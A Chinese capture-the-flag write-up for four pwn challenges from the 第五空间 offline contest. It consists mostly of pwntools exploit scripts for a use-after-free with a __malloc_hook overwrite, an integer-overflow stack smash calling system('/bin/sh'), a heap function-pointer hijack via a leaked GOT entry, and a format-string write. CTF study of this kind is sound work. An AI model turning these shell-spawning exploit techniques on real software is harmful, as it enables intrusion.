第五空间线下pwn部分writeup

壹業

标准的UAF漏洞题

思路

• 创建unsortedbin的chunk,free掉，然后再show，就能泄露libc地址
• 复写malloc_hook为one_gadget

exp

本地环境：ubuntu 16.04

from pwn import *
context.log_level='debug'

r=process('./pwn1')
#r=remote('0.0.0.0',10000)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

libc_off = 0x7f7436b23b78-0x7f743675f000
onegadgets = [0x45216, 0x4526a, 0xf02a4, 0xf1147]

print hex(libc_off)
#pause()
def add(size):
    r.recvuntil('>>')
    r.sendline('1')
    r.recvuntil(':')
    r.sendline(str(size))
def show(idx):
    r.recvuntil('>>')
    r.sendline('2')
    r.recvuntil(':')
    r.sendline(str(idx))
def edit(idx,cont):
    r.recvuntil('>>')
    r.sendline('3')
    r.recvuntil(':')
    r.sendline(str(idx))
    r.recvuntil(':')
    r.sendline(cont)
def delete(idx):
    r.recvuntil('>>')
    r.sendline('4')
    r.recvuntil(':')
    r.sendline(str(idx))

add(0x60)#0
add(0x60)#1
add(0x60)#2
add(0xa0)#3
add(0x60)#4
add(0x60)#5
delete(3)
#gdb.attach(r)
show(3)
r.recvuntil(':')
leak=u64(r.recv(6).ljust(8,'\x00'))
success(hex(leak))

libc.address = leak- libc_off
mallochook=libc.sym['__malloc_hook']

one=libc.address+onegadgets[3]
delete(0)
edit(0,p64(mallochook-0x23))
add(0x60)#6
add(0x60)#7
edit(7,'a'*0x13+p64(one))
add(0x60)#8

r.interactive()

三學

整数溢出造成栈溢出

exp

#!/usr/bin/env python2
#coding=utf-8
from pwn import *
context.log_level='debug'
r=process('./pwn3')
#r=remote("0.0.0.0",10001)
sys=0x8048440
sh=0x804a04c
r.recvuntil(':') #name
r.sendline('/bin/sh\x00')
r.recvuntil(':') #chose
r.sendline('1')
r.recvuntil(':') #size
r.sendline('-1')
r.recvuntil('\n') #content
r.sendline('a'*0x5C+p32(0xffffffff)+p32(sys)+p32(0)+p32(sh))

r.interactive()

四諦

堆中存在调用puts函数的函数指针,而且还通过堆块来调用函数

exp

from pwn import *
context.log_level='debug'
r= process('./pwn4')
elf=ELF('./pwn4')
libc=ELF("/lib/i386-linux-gnu/libc.so.6")
def addnote(size,content):
    r.recvuntil(":")
    r.sendline("1")
    r.recvuntil(":")
    r.sendline(str(size))
    r.recvuntil(":")
    r.sendline(content)
def delnote(idx):
    r.recvuntil(":")
    r.sendline("2")
    r.recvuntil(":")
    r.sendline(str(idx))
def printnote(idx):
    r.recvuntil(":")
    r.sendline("3")
    r.recvuntil(":")
    r.sendline(str(idx))

got_puts=elf.got['puts']
info('got_puts->'+hex(got_puts))
pause()
func=0x80491f2

addnote(32,"0"*4)#0
addnote(32,"1"*4)#1

delnote(0)
delnote(1)
addnote(8,p32(func)+p32(got_puts))#2
#gdb.attach(r)
printnote(0)
r.recvuntil(':')
puts=u32(r.recv(4))
success(hex(puts))
pause()
libc.address=puts-libc.sym['puts']
sys=libc.sym['system']

delnote(2)
addnote(8,p32(sys)+';$0\x00')#3
printnote(0)

r.interactive()

五蘊

格式化字符串漏洞，直接向unk_804c044写特定数，再输入相同的数，可用三种不同方法得到shell

exp

from pwn import *
context.log_level='debug'
r=process('./pwn5')
#r=remote('0.0.0.0',10003)
target=0x804c044
#pay=p32(target)+p32(target+1)+p32(target+2)+p32(target+3)+'%10$hhn%11$hhn%12$hhn%13$hhn'
#r.sendline(str(0x10101010))
pay=p32(target)+'%012s'+'%10$n'
pay=p32(target)+'a'*12+'%10$n'

r.recvuntil(':')
r.sendline(pay)
r.recvuntil(':')
r.sendline(str(0x10))

r.interactive()